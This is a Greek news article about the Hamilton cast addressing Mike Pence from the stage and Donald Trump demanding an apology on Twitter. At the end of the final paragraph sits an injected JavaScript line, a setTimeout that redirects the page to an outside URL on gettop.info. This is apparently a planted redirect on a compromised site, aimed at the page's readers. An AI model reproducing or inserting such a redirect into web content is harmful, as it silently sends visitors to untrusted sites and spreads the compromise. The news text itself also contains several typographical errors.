Τα άκουσε ο νέος αντιπρόεδρος των ΗΠΑ σε θεατρική παράσταση – Απολογία ζητεί ο Τραμπ (ΒΙΝΤΕΟ)

0
7

 

Τη συγγνώμη από τον θίασο του Χάμιλτον απαιτεί ο νεοεκλεγείς πρόεδρος των ΗΠΑ, Ντόναλντ Τραμπ, για χάρη του αντιπροέδρου του Μάικ Πενς που δέχτηκε λεκτική επίθεση έξω από το θέατρο αλλά και την επίπληξη του θιάσου από τη σκηνή.

«Κύριε αντιπρόεδρε, είμαστε μέρος της ΑΜερικής που είναι σε εγρήγορση κι ανησυχεί ότι η νέα διακυβέρνηση της χώρας ούτε θα μας προστατεύσει, εμάς, τον πλανήτη μας, τα παιδιά μας, τους γονείς μας, ούτε θα μας υπερασπιστεί ούτε θα προασπιστεί τα δικαιώματά μας» είπε ο επικεφαλής του θιάσου, Μπράντον Ντίξον.

«Ειλικρινά ελπίζουμε αυτή η παράσταση να σας εμπνεύσει ώστε να προασπιστείτε τις αμερικανικές αξίες και τη δουλειά εκ μέρους όλων μας. Όλους μας», επεσημανε μόλις σηκώθηκε η αυλαία.

Ο Πενς φυγαδεύτηκε προτού ο Ντίξον ολοκληρώσει την ομιλία του αλλά την άκουσε ολόκληρη την ώρα που βρισκόταν στον προθάλαμο του θεάτρου.

Σε ανακοίνωσή του μέσω twitter ο Τραμπ απαίτησε την απολογία των ηθοποιών: «Ο υπέροχος νέος αντιπρόεδρός μας Μάικ Πενς παρενοχλήθηκε χθες βράδυ στο θέατρο, από τον θίασο του Χάμιλτον. Το θέατρο πρέπει να είναι ένας ασφαλής και ξεχωριστός χώρος. Ο θίασος του Χάμιλτον ήταν εξαιρετικά αγενής χθες βράδυ σ’ ένα πολύ καλό άνθρωπο, τον Μάικ Πενς. Απολογηθείτε!».

Μέσω twitter απάντησε και ο Ντίξον λέγοντας πως η συζήτηση δεν είναι παρενίχληση κύριε, ενώ συμπλήρωσε ότι εκτίμησε το γεγονός ότι ο Πενς σταμάτησε για να ακούσει το μήνυμά του.

Μόλις ο αντιπρόεδρος έφθασε στο θέατρο ακούστηκαν αρκετές αποδοκιμασίες κι άλλα επιφωνήματα. Μόλςι άνοιξε η αυλαία ο Ντίξον απηύθυνε στον αντιπρόεδρο το μήνθμά του έχοντας τη σ΄τηριξη όλων των υπόλοιπων ηθοποιών που στέκονταν πίσω του.

«Αντιπρόεδρε Πενς, σε βλέπω να αποχωρείς, αλλά ελπιζω να μας ακούσεις για ακόμη μερικά λεπτά. Δνε υπάρχει λόγος για αποδοκιμασίες κυρίες και κύριοι. Είμαστε όλοι εδώ και μοιραζόμαστε μία ιστορία σχετικά με την αγάπη» επεσήμανε ο Ντίξον.

Έξω από το θέατρο ο αντιπρόεδρος έγινε δεκτός με ακόμη πιο έντονες αποδοκιμασίες. Υπενθυμίζεται ότι η παράσταση Χάιλτον είναι η αγαπημένη του Ομπάμα όπου έχει γίνει δεκτός με ενθουσιασμό από το κοινό. Η Μισέλ Ομπάμα την έχει παρακολουθήσει ήδη, ενώ ο Μπαράκ πήρε μαζί του και τις κόρες του. Φανατικός της παράστασης αυτής και ο αντιπρόεδρος του Ομπάμα, Τζο Μπάιντεν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here